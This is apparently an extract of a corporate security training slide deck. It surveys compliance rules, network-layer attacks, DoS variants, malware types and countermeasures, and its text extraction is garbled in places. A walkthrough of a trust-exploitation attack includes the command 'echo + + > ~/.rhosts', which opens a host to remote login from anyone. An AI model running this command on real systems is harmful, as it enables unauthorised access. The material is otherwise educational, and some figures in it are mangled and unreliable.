ØØ Information Gathering & Network SurveyingInformation Gathering & Network SurveyingØØ Foot printing or FingerprintingFoot printing or FingerprintingØØ Ports Scanning & Services IdentificationPorts Scanning & Services IdentificationØØ Automated Vulnerability ScanningAutomated Vulnerability ScanningØØ Exploiting Services for Known VulnerabilitiesExploiting Services for Known VulnerabilitiesØØ Gaining AccessGaining AccessØØ Escalation of PrivilegesEscalation of PrivilegesØØ Exploiting WebExploiting Web--Based AuthorizationBased AuthorizationØØ Password Cracking / Brute ForcingPassword Cracking / Brute ForcingØØ Denial of Services (DoS) TestingDenial of Services (DoS) TestingØØ Report PreparationReport Preparation
78 © 2009 Wipro Ltd – Internal & Restricted78 © 2009 Wipro Ltd – Internal & Restricted
Compliances and Standards
•Ever Expanding Regulatory Universe
– Sarbanes – Oxley (SOX)– Payment Card Industry (PCI)– HIPAA– GLBA– FFIEC– FTC Red Flags– Etc.
•Frameworks
– COBIT– ISO– ITIL– BITS– Etc.
79 © 2009 Wipro Ltd – Internal & Restricted79 © 2009 Wipro Ltd – Internal & Restricted
Sarbanes-Oxley Act of 2002
• Congress passed the Sarbanes-Oxley Act (SOX) in large part to protect investors by improving the accuracy and reliability of corporate disclosures made pursuant to the securities laws.
• Section 404 of Sarbanes-Oxley not only requires companies to establish and maintain an adequate internal control structure, but also to assess its effectiveness on an annual basis.
SOX
80 © 2009 Wipro Ltd – Internal & Restricted80 © 2009 Wipro Ltd – Internal & Restricted
Administrative Access to Financial Systems• SOX Section 306 (a)(4) & (D)• Lists all logon and privileged access attempts by the Administrator or SU
accounts.Computer Account Logon Activity • ISO 17799 Section A.9.5.2• Sarbanes Oxley sec 306 (a)(4) & (D)
• Lists all local and remote logon activity for all monitored Windows, HP-UX, AIX Unix, Sun Solaris and Red Hat Linux systems.
Computer Account Logon Activity - Windows Detail• ISO 17799 Section A.9.5.2• Sarbanes Oxley sec 306 (a)(4) & (D)• Lists all logon activity for all monitored Windows domains and systems. This
report is specific to monitored Windows systems, but provides a greater level of detail than the Computer Account Logon Activity report.
SOX
81 © 2009 Wipro Ltd – Internal & Restricted81 © 2009 Wipro Ltd – Internal & Restricted
PCI-DSS
82 © 2009 Wipro Ltd – Internal & Restricted82 © 2009 Wipro Ltd – Internal & Restricted
Resource :Sensage
Data Sources in PCI
83 © 2009 Wipro Ltd – Internal & Restricted
4. Security Attacks
84 © 2009 Wipro Ltd – Internal & Restricted84 © 2009 Wipro Ltd – Internal & Restricted
Security Attacks
• Attacks on Different Layers– IP Attacks– ICMP Attacks– Routing Attacks– TCP Attacks– Application Layer Attacks
85 © 2009 Wipro Ltd – Internal & Restricted85 © 2009 Wipro Ltd – Internal & Restricted
Why the Flaws?
• TCP/IP was designed for connectivity– Had its origins in an innocent world– Assumed to have lots of trust– Security not intrinsic to design
• Host implementation vulnerabilities– Software bugs– Some elements in the specification were left to the implementers
86 © 2009 Wipro Ltd – Internal & Restricted86 © 2009 Wipro Ltd – Internal & Restricted
Security Flaws in IP
• The IP addresses are filled in by the originating host– Address spoofing
• Using source address for authentication– r-utilities (rlogin, rsh, rhosts etc..)
InternetInternet
2.1.1.1 C
1.1.1.1 1.1.1.2A B
1.1.1.3 S
Can A claim it is B to the server S?
ARP SpoofingCan C claim it is B to the server S?
Much harderSource Routing?
87 © 2009 Wipro Ltd – Internal & Restricted87 © 2009 Wipro Ltd – Internal & Restricted
Security Flaws in IP
• IP fragmentation attack– End hosts need to keep the fragments till all the fragments arrive
• Traffic amplification attack– IP allows broadcast destination– Problems?
88 © 2009 Wipro Ltd – Internal & Restricted88 © 2009 Wipro Ltd – Internal & Restricted
Ping Flood
Attacking System
InternetInternet
Broadcast Enabled Network
Broadcast Enabled Network
Victim System
89 © 2009 Wipro Ltd – Internal & Restricted89 © 2009 Wipro Ltd – Internal & Restricted
ICMP Attacks
• No authentication
• ICMP redirect message– Can cause the host to switch gateways
• Man in the middle attack, sniffing
• ICMP destination unreachable– Can cause the host to drop connection
• Many more…– http://www.sans.org/rr/whitepapers/threats/477.php
90 © 2009 Wipro Ltd – Internal & Restricted90 © 2009 Wipro Ltd – Internal & Restricted
Routing Attacks
• Distance Vector Routing– Announce 0 distance to all other nodes
• Blackhole traffic• Eavesdrop
• Link State Routing– Can drop links randomly– Can claim direct link to any other router– A bit harder to attack than DV
• BGP– ASes can announce arbitrary prefix– ASes can alter path– Could even happen due to misconfigurations
91 © 2009 Wipro Ltd – Internal & Restricted91 © 2009 Wipro Ltd – Internal & Restricted
TCP Attacks
Issues?– Server needs to keep waiting for ACK y+1– Server recognizes Client based on IP address/port and y+1
ClientServer
SYN xSYN y | ACK x+1
ACK y+1
92 © 2009 Wipro Ltd – Internal & Restricted92 © 2009 Wipro Ltd – Internal & Restricted
TCP Layer Attacks
• TCP SYN Flooding– Exploit state allocated at server after initial SYN packet– Send a SYN and don’t reply with ACK– Server will wait for 511 seconds for ACK– Finite queue size for incomplete connections (1024)– Once the queue is full it doesn’t accept requests
93 © 2009 Wipro Ltd – Internal & Restricted93 © 2009 Wipro Ltd – Internal & Restricted
TCP Layer Attacks
• TCP Session Hijack– When is a TCP packet valid?
• Address/Port/Sequence Number in window– How to get sequence number?
• Sniff traffic• Guess it
– Many earlier systems had predictable ISN– Inject arbitrary data to the connection
94 © 2009 Wipro Ltd – Internal & Restricted94 © 2009 Wipro Ltd – Internal & Restricted
TCP Layer Attacks
• TCP Session Poisoning– Send RST packet
• Will tear down connection– Do you have to guess the exact sequence number?
• Anywhere in window is fine• For 64k window it takes 64k packets to reset• About 15 seconds for a T1
95 © 2009 Wipro Ltd – Internal & Restricted95 © 2009 Wipro Ltd – Internal & Restricted
Application Layer Attacks
• Applications don’t authenticate properly
• Authentication information in clear– FTP, Telnet, POP
• DNS insecurity– DNS poisoning– DNS zone transfer
96 © 2009 Wipro Ltd – Internal & Restricted96 © 2009 Wipro Ltd – Internal & Restricted
An Example
Stephen (S) Trusted (T)
Mahendar
Finger
Finger @Sshowmount –eSend 20 SYN packets to S
Attack when no one is aroundWhat other systems it trusts?Determine ISN behavior
Showmount -e
SYN
97 © 2009 Wipro Ltd – Internal & Restricted97 © 2009 Wipro Ltd – Internal & Restricted
An Example
Stephen (S) Trusted(T)
Mahendar
• Finger @S
• showmount –e
• Send 20 SYN packets to S
• SYN flood T
• Attack when no one is around
• What other systems it trusts?
• Determine ISN behavior
Syn flood X
98 © 2009 Wipro Ltd – Internal & Restricted98 © 2009 Wipro Ltd – Internal & Restricted
An Example
Stephen (S) trusted (T)
Mahendar(M)
• Finger @S
• showmount –e
• Send 20 SYN packets to S
• SYN flood T
• Send SYN to S spoofing as T
• Send ACK to S with a guessed number
• Attack when no one is around
• What other systems it trusts?
• Determine ISN behavior
• T won’t respond to packets
• S assumes that it has a session with T
XSYN
SYN|ACK
ACK
99 © 2009 Wipro Ltd – Internal & Restricted99 © 2009 Wipro Ltd – Internal & Restricted
An Example
Stephen (S) Trusted (T)
Mahendar
• Finger @S
• showmount –e
• Send 20 SYN packets to S
• SYN flood T
• Send SYN to S spoofing as T
• Send ACK to S with a guessed number
• Send “echo + + > ~/.rhosts”
• Attack when no one is around
• What other systems it trusts?
• Determine ISN behavior
• T won’t respond to packets
• S assumes that it has a session with T
• Give permission to anyone from anywhere
X++ > rhosts
100 © 2009 Wipro Ltd – Internal & Restricted100 © 2009 Wipro Ltd – Internal & Restricted
Denial of Service
• Objective à make a service unusable, usually by overloading the server or network
• Consume host resources– TCP SYN floods– ICMP ECHO (ping) floods
• Consume bandwidth– UDP floods– ICMP floods
101 © 2009 Wipro Ltd – Internal & Restricted101 © 2009 Wipro Ltd – Internal & Restricted
Denial of Service
• Crashing the victim– Ping-of-Death– TCP options (unused, or used incorrectly)
• Forcing more computation– Taking slow path in processing of packets
102 © 2009 Wipro Ltd – Internal & Restricted102 © 2009 Wipro Ltd – Internal & Restricted
Coordinated DoS
Attacker
Victim Victim Victim
Attacker Attacker
• The first attacker attacks a different victim to cover up the real attack• The Attacker usually spoofed source address to hide origin• Harder to deal with
103 © 2009 Wipro Ltd – Internal & Restricted103 © 2009 Wipro Ltd – Internal & Restricted
Distributed DoS
Attacker
Handler Handler
Agent Agent Agent Agent Agent
Victim
104 © 2009 Wipro Ltd – Internal & Restricted104 © 2009 Wipro Ltd – Internal & Restricted
DDoS Defenses
• Network Capabilities– Destination explicitly decides whether or not to allow packets– Indicate decision by inserting “capabilities” in packets– Routers en route check for valid capabilities in subsequent packets– Issues?
• Traffic Scrubbers– Sink all traffic to a back-end– Scrub, scrub, scrub– Issues?
105 © 2009 Wipro Ltd – Internal & Restricted105 © 2009 Wipro Ltd – Internal & Restricted
Attacks
• Denial of Service (DoS)– SYN flood– Smurf– Distributed DoS
• Spoofing– IP spoofing– ARP poisoning– Web spoofing– DNS spoofing
106 © 2009 Wipro Ltd – Internal & Restricted106 © 2009 Wipro Ltd – Internal & Restricted
Attacks
• Man-in-the-middle• Replays• TCP Session hijacking• Social Engineering
– Dumpster diving– Online attacks
• Web defacement
107 © 2009 Wipro Ltd – Internal & Restricted107 © 2009 Wipro Ltd – Internal & Restricted
Attacks
• Attacks on encrypted data– Weak keys– Birthday attack– Dictionary attack
• Countermeasures
108 © 2009 Wipro Ltd – Internal & Restricted108 © 2009 Wipro Ltd – Internal & Restricted
SYN flooding attack
– This exploits how the 3-way handshake of TCP services for opening a session works.
– SYN packets are sent to the target node with incomplete source IP addresses
– The node under attack sends an ACK packet and waits for response– Since the request has not been processed, it takes up memory– Many such SYN packets clog the system and take up memory– Eventually the attacked node is unable to process any requests as it
runs out of memory storage space
109 © 2009 Wipro Ltd – Internal & Restricted109 © 2009 Wipro Ltd – Internal & Restricted
TCP 3-way Handshake
PC PC
TCP State TCP StateTCP Packet
Closed
SYN-sent
ACK-received
Established Established
SYN-received
ACK-sent
Listen
SEQ = 1000, CTL = SYN
SEQ = 750, ACK = 1001, CTL = SYN | ACK
SEQ = 1000, ACK = 751, CTL = ACK
110 © 2009 Wipro Ltd – Internal & Restricted110 © 2009 Wipro Ltd – Internal & Restricted
Land attack
• Similar to SYN attack• Uses the target address as the source address as well• Causes an infinite loop under the SYN/ACK process
111 © 2009 Wipro Ltd – Internal & Restricted111 © 2009 Wipro Ltd – Internal & Restricted
Smurf attack
• A brute force DOS attack and thus a non-OS specific attack• A large number of PING requests with spoofed IP addresses are generated from
within the target network• Each ping request is broadcast, resulting in a large number of responses from all
nodes on the network• Clogs the network and prevents legitimate requests from being processed
112 © 2009 Wipro Ltd – Internal & Restricted112 © 2009 Wipro Ltd – Internal & Restricted
Port scanning
• Scanning the source and destination ports for both TCP and UDP for data capture
• TCP ports are commonly monitored but UDP ports are not
113 © 2009 Wipro Ltd – Internal & Restricted113 © 2009 Wipro Ltd – Internal & Restricted
Ping of death
• The hacker sends an illegal echo packet with more bytes than allowed, causing the data to be fragmented. This causes the data to be stored causing buffer overflows, kernel dumps, and crashes
• This was made possible by some Windows OSs allowing non-standard ICMP (Internet Control Message Protocol) messages to be generated
• Maximum ICMP packet size is 65507 bytes. Any echo packet exceeding this size will be fragmented by the sender and the receiver will try to reconstitute the packet, when overflow would occur
114 © 2009 Wipro Ltd – Internal & Restricted114 © 2009 Wipro Ltd – Internal & Restricted
UDP-flood attack
• Denial of service variant
• Connects the target machine’s chargen and echo services to create an infinite loop between two or more UDP services
• Connectivity to the network is sufficient, no network account required for this attack
115 © 2009 Wipro Ltd – Internal & Restricted115 © 2009 Wipro Ltd – Internal & Restricted
Distributed Denial of Service
• Hackers post malicious software on the web• Script kiddies (people who do not fully understand the code) launch the attacks• In DDoS, the hacker (also known as Black hat) identifies computers with weak
security as handlers. The software in the handlers scan for hosts to be used as agents or zombies. Hundreds of thousands of zombies simultaneously launch the DoS attack in a distributed manner.
116 © 2009 Wipro Ltd – Internal & Restricted116 © 2009 Wipro Ltd – Internal & Restricted
IP Spoofing
• Exploits trust relationships between routers• This is a difficult attack to launch since the communication set up is based
on an initial sequence number for packets. Systems no longer use numbers sequentially. Identifying the algorithm used for numbering packets during set up is important.
117 © 2009 Wipro Ltd – Internal & Restricted117 © 2009 Wipro Ltd – Internal & Restricted
ARP Poisoning
• ARP = Address Resolution Protocol• ARP is used by routers extensively to find the destination node. Routers
have IP addresses (32-bits). In order to deliver the packet to the destination node, the router broadcasts the IP address of the destination and obtains the MAC address (48-bits).
• ARP Poisoning tools are:– ARPoison– Ettercap– Parasite
118 © 2009 Wipro Ltd – Internal & Restricted118 © 2009 Wipro Ltd – Internal & Restricted
ARP Poisoning
• Hosts store the IP-to-MAC address mapping in the ARP table. ARP Poisoning means that the ARP communication is intercepted by redirection from a router.
• Example:– Assume router’s IP is 10.1.1.0– Host’s IP is 10.1.1.1– Malicious host with IP 10.1.1.2 spoofs 10.1.1.1 and replies to
requests from 10.1.1.0 with its MAC address– From this point on all packets meant for 10.1.1.1 is routed to
10.1.1.2 because the router has the MAC address of 10.1.1.2 in its routing table
119 © 2009 Wipro Ltd – Internal & Restricted119 © 2009 Wipro Ltd – Internal & Restricted
Web Spoofing
• In this attack the malicious site pretends to be authentic• It is a form of man-in-the-middle attack• This is accomplished by accessing the victim website and putting a link to the
malicious site on a legitimate name. For example, www.nybank.com could be linked to www.hacksite.com but the user would not be aware of this unless they pay attention to the actual site linked.
120 © 2009 Wipro Ltd – Internal & Restricted120 © 2009 Wipro Ltd – Internal & Restricted
DNS Spoofing
• This is similar to web spoofing• DNS server could be a simple machine placed behind a firewall• Usually it is isolated from the rest of the nodes in functionality• Hacker gets access to the DNS server and changes in the lookup table the
mapping. For example, www.nybank.com is supposed to point to 199.230.116.100. The hacker could redirect it to his web server instead.
121 © 2009 Wipro Ltd – Internal & Restricted121 © 2009 Wipro Ltd – Internal & Restricted
Replays
• Replay involves capturing traffic while in transit and use that to gain access to systems.
• Example:– Hacker sniffs login information of a valid user– Even if the information is encrypted, the hacker replays the login
information to fool the system and gains access
122 © 2009 Wipro Ltd – Internal & Restricted122 © 2009 Wipro Ltd – Internal & Restricted
Replays
• A sniffer is a program that intercepts and reads traffic on the network• Sniffers work when the NIC is set to communicate in promiscuous mode
123 © 2009 Wipro Ltd – Internal & Restricted123 © 2009 Wipro Ltd – Internal & Restricted
Replay Attack Diagram
Valid user
Sniffer Server
Hacker
Sniffed id and pwd
replays id and pwd
124 © 2009 Wipro Ltd – Internal & Restricted124 © 2009 Wipro Ltd – Internal & Restricted
TCP Session Hijacking
• This means that the hacker has directed traffic to his server instead of a trusted server that the victim is assuming
• To hijack a session, the hacker ARP poisons the router to route all traffic to his computer before it is delivered to the victim
• See Figure 3-14 (p. 68) in the book for details of IP and MAC addresses needed to understand this type of attack
125 © 2009 Wipro Ltd – Internal & Restricted125 © 2009 Wipro Ltd – Internal & Restricted
Dictionary attack
• Has an idea of the message• Has the hashed value from the message• Exhaustive search to find the original corresponding to the hash• Credit cards use 16 digits
– 255 = 1016
– This is within the realm of possibility for today’s computers to do an exhaustive search
• Does not involve any encryption
126 © 2009 Wipro Ltd – Internal & Restricted126 © 2009 Wipro Ltd – Internal & Restricted
Birthday attack
• A variation of brute-force attack• Studies have shown that if 23 people are in a room, the probability is
over 50% that two people have the same birthday• The similarity here is, knowing one value can you find the matching
value
127 © 2009 Wipro Ltd – Internal & Restricted127 © 2009 Wipro Ltd – Internal & Restricted
Countermeasures
• For SYN-flood attack:– Firewall can withhold or insert packets into the data stream, thus
providing one means from letting the SYN packets get through
– Firewall responds immediately to the SYN with its ACK sent to the spoofed address. This way the inquiry is not in the open queue taking up space. Legitimate addresses would respond immediately and they could be forwarded by the firewall to the internal systems. SYN-flood attack packets would not receive a reply from the spoofed address and so they will be sent a RST (reset) signal after the timeout set.
128 © 2009 Wipro Ltd – Internal & Restricted128 © 2009 Wipro Ltd – Internal & Restricted
Countermeasures
• For Smurf attack:– Routers should be configured to drop ICMP messages from outside
the network with a destination of an internal broadcast or multicast– Newer Oss for routers and workstations have protection for known
smurf attacks
129 © 2009 Wipro Ltd – Internal & Restricted129 © 2009 Wipro Ltd – Internal & Restricted
Countermeasures
• For IP Spoofing attack:– This is a difficult attack to start with for the hacker– Hacker should be able to guess correctly the Initial Sequence Number
that the spoofed IP would generate– To prevent IP spoofing, disable source routing on all internal routers– Filter entering packets with a source address of the local network
130 © 2009 Wipro Ltd – Internal & Restricted130 © 2009 Wipro Ltd – Internal & Restricted
Countermeasures
• For Man in the middle attack:– Routers should be configured to ignore ICMP redirect packets
• Intrusion Detection System (IDS) is a software that can scan traffic in real time and detect anomalies
• Cisco, Computer Associates, Secure Works are some of the companies that provide IDS software
• Availability of IDS is a requirement in the medical and financial industry for the business to get its license
• The industry is now moving towards an Intrusion Prevention System (IPS) as opposed to an IDS
131 © 2009 Wipro Ltd – Internal & Restricted131 © 2009 Wipro Ltd – Internal & Restricted
Countermeasures
• For Ping of death attack:– Prohibit creation of ICMP packets of invalid size
• For Denial of Service attack:– Firewalls and routers at network boundaries can use filters to prevent
spoofed packets from leaving the network– Filter incoming packets with a broadcast address– Turning off direct broadcasts on all internal routers– Block known private IP addresses being used as destination IP (e.g.,
10.0.0.0, 172.16.24.0, 192.168.0.0, 224.0.0.0, 127.0.0.1)
132 © 2009 Wipro Ltd – Internal & Restricted
5. Software Exploitation
133 © 2009 Wipro Ltd – Internal & Restricted133 © 2009 Wipro Ltd – Internal & Restricted
Software Exploitation
• Malicious software, also known as malware, includes worms, viruses, and Trojan horses
• How do these propagate?– Virus is meant to replicate itself into executables (e.g., Melissa)– Worm is meant to propagate itself across the network (e.g., Nimda,
Code Red)– Trojan horse is meant to entice the unsuspecting user to execute a
worm (e.g., I Love You)
134 © 2009 Wipro Ltd – Internal & Restricted134 © 2009 Wipro Ltd – Internal & Restricted
Software exploitation
– Malicious software (virus and worm)– Back door– Logic bombs
135 © 2009 Wipro Ltd – Internal & Restricted135 © 2009 Wipro Ltd – Internal & Restricted
Malicious code• Type Characteristics
Virus Attaches itself to programs and propagates copies of itself to other programs
Trojan horse Contains unexpected functionalityLogic bomb Triggers action when a condition occursTime bomb Triggers action at a certain timeTrapdoor Allows unauthorized access to functionalityWorm Propagates copies of itself through a networkRabbit Replicates without limit to exhaust resources
136 © 2009 Wipro Ltd – Internal & Restricted136 © 2009 Wipro Ltd – Internal & Restricted
Viruses
• Viruses
• String of computer code that attaches to other programs and replicates
– File infectors – Oldest type of virus, now mostly extinct– Boot-sector viruses – Reside on the boot portion of a disk.
Also mostly extinct– Macro viruses – Written in a scripting language and affects data
files, not programs. Future of viruses.• No absolute cure for viruses
– Antivirus programs work, but need continual updating.– Virus makers depend on laziness of users to let virus defs get
out of date.
137 © 2009 Wipro Ltd – Internal & Restricted137 © 2009 Wipro Ltd – Internal & Restricted
Virus
• Virus self-replicates• Early viruses (1980s to mid-90s) were placed on boot sector of hard and
floppy drives as they would not show up in the directory listing• Second type of virus is known as ‘parasitic virus.’ This was prevalent in
mid-90s.• Parasitic virus attaches to files and infect files of type exe, sys, com, dll,
bin, drv• Third virus type is ‘multipartite virus’. This infected both boot sector and
files. This was also common in the mid-90s.• Current virus type is known as ‘macro virus.’ These are application
specific as opposed to operating system specific. They propagate rapidly through email. Most macro viruses are written in VB Script and they exploit Microsoft’s applications such as Outlook.
138 © 2009 Wipro Ltd – Internal & Restricted138 © 2009 Wipro Ltd – Internal & Restricted
Viruses and Worms
• Virus is a program that reproduces itself by attaching its code to another program– They require human intervention to spread– Melissa, I LOVE YOU spread by e-mail
• Worms actively replicate without a helper program– Is a subclass of virus, but does not require user intervention– Sasser and Blaster targeted machines with out of date software
139 © 2009 Wipro Ltd – Internal & Restricted139 © 2009 Wipro Ltd – Internal & Restricted
Antivirus
Antivirus software is a term used to describe a computer program that attempts to identify, neutralize or eliminate malicious software. This type of software is so named because the earliest examples were designed exclusively to combat computer viruses; however most modern antivirus software is now designed to combat a wide range of threats, including worms, phishing attacks, rootkits, trojan horses.
Antivirus software typically uses two different techniques to accomplish this:
-Examining (scanning) files to look for known viruses matching definitions in a virus dictionary
-Identifying suspicious behavior from any computer program which might indicate infection. Such analysis may include data captures, port monitoring and other methods.
140 © 2009 Wipro Ltd – Internal & Restricted140 © 2009 Wipro Ltd – Internal & Restricted
Worms & Trojan Horses
– Worms• Particular to networked computer systems• Gains access to resources that point to other computers• Replicates itself to multiple systems• Rarely dangerous, mostly annoying
– Trojan Horses• Code that imbeds itself into something useful• Collects information and sends to known site on the network• Also can allow external takeover of your system (Back Orifice)
141 © 2009 Wipro Ltd – Internal & Restricted141 © 2009 Wipro Ltd – Internal & Restricted
”Good viruses”
• Are hard to detect• Are hard to destroy• Spread widely• Can re-infect cleaned files• Are easy to create• Are machine independent
142 © 2009 Wipro Ltd – Internal & Restricted142 © 2009 Wipro Ltd – Internal & Restricted
Hiding places• Boot sector• Memory- resident viruses• Macro, library etc. viruses
Boot Strap Loader
SystemInitialization
Virus Code SystemInitialization
Boot Strap Loader
Normal Process
Infection
143 © 2009 Wipro Ltd – Internal & Restricted143 © 2009 Wipro Ltd – Internal & Restricted
Effects and causes
Effect How caused?Attach to executable · Modify file directoryProgram · Write to executable file
Attach to data or control · Modify directory· Rewrite data· Append to data· Append data to itself
144 © 2009 Wipro Ltd – Internal & Restricted144 © 2009 Wipro Ltd – Internal & Restricted
Effects and causes
Effect How caused?Remain in memory · Intercept interrupts and modify handlers
Infect disks · Intercept interrupt· Intercept OS call· Modify system file· Modify ordinary executables
Spread infection · Infect boot sector· Infect system program· Infect ordinary program· Infect data that controls
ordinary programs
145 © 2009 Wipro Ltd – Internal & Restricted145 © 2009 Wipro Ltd – Internal & Restricted
Malware
Malware is software designed to infiltrate or damage a computer system without the owner's informed consent. It is a portmanteau of the words "malicious" and "software". The expression is a general term used by computer professionals to mean a variety of forms of hostile, intrusive, or annoying software or program code.
Software is considered malware based on the perceived intent of the creator rather than any particular features. It includes computer viruses, worms, trojan horses, most rootkits, spyware, dishonest adware, and other malicious and unwanted software. In law, malware is sometimes known as a computer contaminant.
146 © 2009 Wipro Ltd – Internal & Restricted146 © 2009 Wipro Ltd – Internal & Restricted
Malware
• Modern Malicious Code – “Malware”– Around 1999 was first occurrence of large propagation of e-mail infecting
malware– Virus protection is now more reactive– E-mail infections are insidious by bypassing firewalls.– Multi-module programs and plugins increase vulnerability– Dynamic linking increase problems also– Mobile code (Java, JavaScript, ActiveX, Plugins) allows for easier delivery
mechanism
147 © 2009 Wipro Ltd – Internal & Restricted147 © 2009 Wipro Ltd – Internal & Restricted
Vulnerability to Malware In this context, as throughout, it should be borne in mind that the “system” under attack may be of various types, e.g. a single computer and operating system, a network or an application.
Various factors make a system more vulnerable to malware:
Homogeneity – e.g. when all computers in a network run the same OS, if you can break that OS, you can break into any computer running it.
Defects – most systems containing errors which may be exploited by malware.
Unconfirmed code – code from a floppy disk, CD-ROM or USB device may be executed without the user’s agreement.
Over-privileged users – some systems allow all users to modify their internal structures.
Over-privileged code – most popular systems allow code executed by a user all rights of that user.
148 © 2009 Wipro Ltd – Internal & Restricted148 © 2009 Wipro Ltd – Internal & Restricted
Types of Malware1. Worms and viruses are computer programs that replicate themselves without
human intervention. The difference is that a virus attaches itself to, and becomes part of, another executable (i.e., runnable) program, whereas a worm is self-contained and does not need to be part of another program to replicate itself.
2. A trojan, or trojan horse, is software that is disguised as a legitimate program in order to entice users to download and install it. In contrast to worms and viruses, trojans are not directly self-replicating. They can be designed to do various harmful things, including corrupt files erase data and install other types of malware.
3. A backdoor (usually written as a single word) is any hidden method for obtaining remote access to a computer or other system. Backdoors typically work by allowing someone or something with knowledge of them to use special password(s) and/or other actions to bypass the normal authentication (e.g., user name and password) procedure on a remote machine (i.e., a computer located elsewhere on the Internet or other network) to gain access to the all-powerful root (i.e., administrative) account.
149 © 2009 Wipro Ltd – Internal & Restricted149 © 2009 Wipro Ltd – Internal & Restricted
Types of Malware (Contd.)
4.A rootkit is software that is secretly inserted into a computer and which allows an intruder to gain access to the root account and thereby be able to control the computer at will. Rootkits frequently include functions to hide the traces of their penetration, such as by deleting log entries.
They typically include backdoors so that the intruder can easily gain access again at a later date, for example, in order to attack other systems at specific times.
5.Spam is unwanted e-mail which is sent out in large volume. Although people receiving a few pieces of spam per day might not think that it is anything to be too concerned about, it is a major problem for several reasons, including the facts that its huge volume (perhaps half or more of all e-mail) places a great load on the entire e-mail system, it often contains other types of malware and much of its content is fraudulent.
Organizations typically have to devote considerable resources to attempting to filter out and delete spam while not losing legitimate e-mail, thereby distracting them from their primary tasks.
150 © 2009 Wipro Ltd – Internal & Restricted150 © 2009 Wipro Ltd – Internal & Restricted
Steps to Counter Malware
There are a number of steps that computer users can take to minimize the chances of becoming infected by malware.
-They include using relatively secure software,
-Providing physical security for computers and networks, enforcing the use of strong passwords,
-Employing firewalls,
-Using malware detection programs,
-Avoiding opening e-mail attachments of unknown origin, avoiding the downloading of dubious programs and avoiding use of the root account except when absolutely necessary.
151 © 2009 Wipro Ltd – Internal & Restricted151 © 2009 Wipro Ltd – Internal & Restricted
Trojan Horse
• Malicious program disguised as an innocent one– Could modify/delete user’s file, send important info to cracker,
etc• The program has to get to the computer somehow
– Cracker hides it as a new game, e-card, windows update site, etc.
• When run, Trojan Horse executes with user’s privileges• Examples:
– Hide program in path directory as a common typo: la for ls– Malicious user puts malicious ls in directory, and attracts
superuser• Malicious ls could make user the superuser • Denning’s paper 1999
152 © 2009 Wipro Ltd – Internal & Restricted152 © 2009 Wipro Ltd – Internal & Restricted
Login Spoofing
• Specialized case of Trojan Horse– Attacker displays a custom screen that user thinks belong to the
system– User responds by typing in user name and password
– Can be circumvented by key sequence that user programs cannot catch: e.g. CTRL+ALT+DEL in Windows
153 © 2009 Wipro Ltd – Internal & Restricted153 © 2009 Wipro Ltd – Internal & Restricted
Logic Bombs
• Piece of code, in the OS or app, which is dormant until a certain time has elapsed or event has occurred– Event could be missing employee record from payroll
• Could act as a Trojan Horse/virus once triggered• Also called “slag code” or “time bomb”• Recovery options for a firm include:
– Calling the police– Rehiring the programmer
154 © 2009 Wipro Ltd – Internal & Restricted154 © 2009 Wipro Ltd – Internal & Restricted
Trap Doors
• Code in system inserted by programmer to bypass normal check• Ken Thompson “Reflections on Trusting Trust”
– Hole in UNIX system utility; enforced by C compiler
155 © 2009 Wipro Ltd – Internal & Restricted155 © 2009 Wipro Ltd – Internal & Restricted
Buffer Overflow
• C compiler does no array bounds checking– A number of programs a written in C– Cracker can force his routine to run by violating array bounds
156 © 2009 Wipro Ltd – Internal & Restricted156 © 2009 Wipro Ltd – Internal & Restricted
Policies, Standards &Baseline
• Security Policy- an overall general statement produced by senior management.
• Standards – Refers to mandatory activities, actions, rules or regulations.
• Baselines – Minimum level of security that is required. A consistent reference point.
• Guidelines – Recommended actions, Industry Best Practices.• Procedures-Detailed step by step task developed to provide
standardization of activities.
157 © 2009 Wipro Ltd – Internal & Restricted157 © 2009 Wipro Ltd – Internal & Restricted
Common Threat Classification
Spoofed packets, etc.
Buffer overflows, illicit paths, etc.
SQL injection, XSS, input tampering, etc.
Network Host Application
Threats againstthe network
Threats against the host
Threats against the application
158 © 2009 Wipro Ltd – Internal & Restricted158 © 2009 Wipro Ltd – Internal & Restricted
Examples of Network Threats
Threat Examples
Information gathering Port scanning
Using trace routing to detect network topologies
Using broadcast requests to enumerate subnet hosts
Eavesdropping Using packet sniffers to steal passwords
Denial of service (DoS) SYN floods
ICMP echo request floods
Malformed packets
Spoofing Packets with spoofed source addresses
159 © 2009 Wipro Ltd – Internal & Restricted159 © 2009 Wipro Ltd – Internal & Restricted
Examples of Host Threats
Threat Examples
Arbitrary code execution Buffer overflows in ISAPI DLLs (e.g., MS01-033)
Directory traversal attacks (MS00-078)
File disclosure Malformed HTR requests (MS01-031)
Virtualized UNC share vulnerability (MS00-019)
Denial of service (DoS) Malformed SMTP requests (MS02-012)
Malformed WebDAV requests (MS01-016)
Malformed URLs (MS01-012)
Brute-force file uploads
Unauthorized access Resources with insufficiently restrictive ACLs
Spoofing with stolen login credentials
Exploitation of open ports and protocols
Using NetBIOS and SMB to enumerate hosts
Connecting remotely to SQL Server
160 © 2009 Wipro Ltd – Internal & Restricted160 © 2009 Wipro Ltd – Internal & Restricted
Examples of Application Threats
Threat Examples
SQL injection Including a DROP TABLE command in text typed into an input field
Cross-site scripting Using malicious client-side script to steal cookies
Hidden-field tampering Maliciously changing the value of a hidden field
Eavesdropping Using a packet sniffer to steal passwords and cookies from traffic on unencrypted connections
Session hijacking Using a stolen session ID cookie to access someone else's session state
Identity spoofing Using a stolen forms authentication cookie to pose as another user
Information disclosure Allowing client to see a stack trace when an unhandled exceptionoccurs
161 © 2009 Wipro Ltd – Internal & Restricted161 © 2009 Wipro Ltd – Internal & Restricted
OWASP Top Ten Web Vulnerabilities
• A1. Unvalidated Input• A2. Broken Access Controls• A3. Broken Authentication and Session Management• A4. Cross Site Scripting Flaws• A5. Buffer Overflows• A6. Injection Flaws• A7. Improper Error Handling• A8. Insecure Storage• A9. Denial of Service• A10. Insecure Configuration Management
162 © 2009 Wipro Ltd – Internal & Restricted162 © 2009 Wipro Ltd – Internal & Restricted
• Authentication and Session Management:
• “Session hijacking”
• ‘Hijack’ another user session by intercepting or predicting any cookies sent by the site (allows impersonation by using established/authenticated access)
• How do you protect it?
– Integrity with hash?– Encryption?– Encode it with easily reversible scheme?– Timeouts for length of session ID?– Prohibit predictable session IDs and cookies
• Hackers will test it by:
– Logging on and off over and over again and across different times
Session Management
163 © 2009 Wipro Ltd – Internal & Restricted163 © 2009 Wipro Ltd – Internal & Restricted
• Authentication and Session Management: Session Hijacking
1st Try:rbcSetCookie("F100","1/WL2/6a0yKsQJ13A3B4NnSan97lZARQN69zCMZDoezJ5De0AX8b
